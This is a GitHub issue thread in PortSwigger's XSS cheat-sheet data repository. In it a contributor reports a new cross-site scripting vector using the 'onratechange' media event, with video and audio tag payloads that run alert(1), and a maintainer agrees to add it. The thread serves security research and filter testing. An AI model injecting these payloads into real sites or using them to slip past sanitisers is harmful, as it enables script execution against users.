### ISSUE TITLE
New XSS Vector `onratechange`

### ISSUE THREAD

**Issue by dwisiswant0** [PortSwigger/xss-cheatsheet-data#32]
Hi, I found a new XSS vector with `onratechange` event. It fires when the playing speed of the audio/video is changed.

**Examples**

1. Video tag:
```html
<video controls autoplay onratechange=alert(1) onplay=this.playbackRate=0><source src="validvideo.mp4" type="video/mp4"></video>
```

2. Audio tag:
```html
<audio controls autoplay onratechange=alert(1) onplay=this.playbackRate=0><source src="validaudio.mp3" type="audio/mpeg"></audio>
```

I realize that having the `onplay(ing)` attribute suffices, but it's also possible that the playback controls come from outside _(e.g. by selecting a speed option or pressing a certain button)_ causing this vector to require user interaction. Thoughts? :D

Best!

**Comment by hackvertor** [comment]
Yeah probably worth adding. So you need to increase the speed of the video by clicking an icon?

**Comment by dwisiswant0** [comment]
> Yeah probably worth adding. So you need to increase the speed of the video by clicking an icon?

Indeed it is.

**Comment by hackvertor** [comment]
Thanks this has been added and you've been credited. It will appear in the next update.
